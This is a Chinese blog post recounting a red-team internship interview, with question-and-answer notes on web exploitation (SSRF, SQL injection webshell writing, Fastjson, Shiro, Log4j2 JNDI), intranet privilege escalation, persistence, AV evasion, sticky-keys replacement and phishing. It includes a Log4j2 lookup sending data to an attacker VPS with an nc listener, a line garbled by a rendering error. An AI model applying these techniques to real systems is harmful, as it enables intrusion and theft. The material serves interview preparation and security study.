某红队实习面经(附答案)

免责声明:该⽂章仅供安全学习和技术分享,请勿将该⽂章和⽂章中提到的技术⽤于违法活动上,切勿在⾮授权状态
下对其他站点进⾏测试,如产⽣任何后果皆由读者本⼈承担,与猩红实验室⽆关!如有侵权,联系删除,转载请注明出处,感谢!

面试的时间很长,导致有很多问题都忘了,只想起来这些,面试寄了,师傅们当个参考就好。
1.简单自我介绍
答:工作经验,项目经验,擅长的方向巴拉巴拉
2.你在hvv/攻防演练中取得了哪些成绩?
答:照着自己的经历说就行
3.上一个工作的主要内容?
答:同上
4.有没有遇到过有意思的逻辑漏洞?
答:找回密码跳步,6个1的测试验证码等等
5.有没有自己开发过武器/工具?
答:没有,只二开过小工具
6.有cve/cnvd吗?
答:我菜,没有
7.有src排名吗?
答:我菜,没有
8.有钓鱼经历吗?具体说说
答:钓校园vpn,hvv期间伪造重大漏洞补丁群发蓝队邮箱等等

Web方面:
1.xss除了获取cookie还能干什么?
答:用户劫持、结合csrf
补充:貌似能提权??
2.Ssrf的原理与危害?
答:伪造服务器给内网发消息
3.Ssrf和csrf有什么区别?
答:csrf伪造客户端,ssrf伪造服务器端
4.如何寻找注入点?
答:字符,数字,盲注…
5.有用过sql注入传马吗?
答:用过into outfile
补充:可以通过日志文件写入木马
6.–os-shell的条件?
答:拥有网站的写入条件
补充:Secure_file_priv参数为空或者为指定路径。
7.Fastjson的原理?
答:启一个rmi的服务器,上面挂payload,让被攻击的目标反序列化特定的类,这个类最终会调用lookup()函数,导致jndi接口指向rmi服务器上的恶意payload
8.利用fastjson注入内存马原理?
答:不知道这里应该怎么说,例如spring mvc的话就是通过fastjson的反序列化,利用jndi的方式让web端加载恶意类,注入controller
9.内存马免杀有做过吗?具体说说
答:没做过,在网上找现成的
补充:
Filter名称是否合理
Filter对应的类名是否合理
Filter对应的类是否在classpath下
网站web.xml中是否存在改filter

10.Shiro550和shiro721的区别?
答:550有url就行,721还需要提供有效的rememberMe Cookie
补充:721多了个rememberMe Cookie重认证
11.你能从代码层理解shiro的原理吗?
答:这个说起来太麻烦了,自行百度吧
12.你拿到key了但是没有攻击链,此时应该怎么办?
答:这个我真不知道了
13.Log4j2高版本jdk不支持外部加载jndi,应该怎么利用?
答:不会
补充:目前高版本JDK的防护方式主要是针对加载远程的ObjectFactory的加载做限制,只有开启了某些属性后才会通过指定的远程地址获取ObjectFactory的Class并实例化,进而通过ObjectFactory#getObjectInstance来获取返回的真实对象。但是在加载远程地址获取ObjectFactory前,首先在本地ClassPath下加载指定的ObjectFactory,本地加载ObjectFactory失败后才会加载远程地址的ObjectFactory,所以一个主要的绕过思路就是加载本地ClassPath下的ObjectFactory。具体的先知和跳跳糖上有文章,自己去看。
14.不借助dnslog有办法检测log4j2是否出网吗
答:dns到vps判断是否出网
补充:使用logg.error(“KaTeX parse error: Expected '}', got 'EOF' at end of input: …s://xxxxx:8090/{java:version}}”);在自己的VPS上nc -luvvp 8090即可收到信息
15.你是如何验证struts2是否存在的
答:检测工具,或者抓包,改post,把content-Type改为application/xml,放上payload
16.有做过代码审计吗?有0day吗?
答:做过,没有
17.Redis未授权有了解吗?
答:有,可以配合ssrf打组合拳
18.Springboot 有哪些漏洞?
答:只知道一个snakeyaml
19.冰蝎和菜刀等webshell工具有什么区别?
答:冰蝎有流量动态加密
20.Xxe原理与攻击手法?
答:解析XML输入时可以加载外部实体类,造成文件读取,命令执行等危害。直接dtd加载dnslog等等

内网方面:
1.如何判断当前主机是否在域环境内?
答:ipconfig /all看dns后缀
补充:systeminfo、net config workstation、net time /domain
2.linux和windows怎么判断?
答:linux大小写敏感
3.Cs和msf的优缺点?
答:我当时回答的是msf功能强大,但是只能上线一台,cs可以同时上线多台机器,插件多,但是没msf好用。
4.如何进行cs特征隐藏?
答:修改默认的50050端口,修改证书文件特征
补充:利用插件设置混淆配置文件
5.免杀有几种途径?
答:修改特征码、流量混淆、花指令、加壳
补充:看格林的免杀思路总结
6.谈谈Windows系统与Linux系统提权的思路
答:我当时只说了win的提权
补充:
Win
1.系统内核溢出漏洞提权
2.数据库提权
3.错误的系统配置提权
4.组策略首选项提权
5.WEB中间件漏洞提权
6.DLL劫持提权
7.滥用高危权限令牌提权
8.第三方软件/服务提权等
Linux
1.Linux内核漏洞提权
2.低权限用户目录下可被Root权限用户调用的脚本提权(SUID)
3.环境变量劫持高权限程序提权
4.sudoer配置文件错误提权

7.你是怎么搭建隧道的
答:探测内网出网协议,netsh端口转发,正反向shell,转发dmz区端口,反弹socks5,
8.权限维持的思路?
答:加服务,加注册表 加启动项
9.简单说一下mssql提权
答:我只记得xp_cmdshell和自启动
补充:trigger提权、沙盒提权、计划任务提权、sethc.exe 替换粘滞键提权
(替换c:\windows\system32\下的sethc.exe替换c:\windows\system32\dllcache\sethc.exe)
10.制作白银票据需要哪些条件?
答:域名、SID、密码HASH、伪造用户名、要访问的服务

在这里插入图片描述

  • 5
    点赞
  • 41
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Goby红队版POC是一个专门为红队渗透测试设计的工具。红队渗透测试是指模拟攻击者的技术和策略来评估组织的网络安全防御能力,并识别潜在的漏洞和弱点。Goby红队版POC通过发现、测试和利用网络系统和应用程序中的漏洞,帮助安全团队更好地保护组织的网络。 Goby红队版POC的主要功能包括漏洞扫描、漏洞检测和漏洞利用。它可以扫描网络目标,查找可能存在的漏洞,并生成详细的报告。与传统的漏洞扫描工具不同,Goby红队版POC还具备漏洞检测的能力,可以通过发送特定的网络数据包来检测目标系统的漏洞。同时,它还提供了漏洞利用的功能,可以自动化地利用漏洞攻击目标系统,以验证漏洞的存在性,并帮助安全团队修补这些漏洞。 Goby红队版POC还具备一个直观的用户界面,使安全团队能够方便地管理和执行渗透测试任务。它提供了多种方式来配置和管理扫描任务,包括选择扫描目标、设置扫描选项、编写自定义POC等。同时,它还支持生成漏洞报告,以便安全团队更好地识别和修补漏洞。 总之,Goby红队版POC是一款功能强大的红队渗透测试工具,能够帮助安全团队发现和利用网络系统和应用程序中的漏洞,提高组织的网络安全防御能力。它的直观用户界面和丰富的功能使得安全团队能够更加高效地管理和执行渗透测试任务,并根据测试结果采取相应的修补措施。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值